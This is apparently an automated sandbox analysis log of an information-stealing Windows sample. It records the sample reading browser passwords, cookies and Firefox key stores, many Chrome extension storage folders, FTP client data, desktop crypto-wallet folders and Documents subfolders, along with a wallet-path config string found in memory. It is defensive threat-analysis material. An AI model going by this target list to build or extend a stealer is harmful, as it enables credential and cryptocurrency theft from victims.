                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434756137.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%app!
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434756137.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%app!
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1434698733.000000000143F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
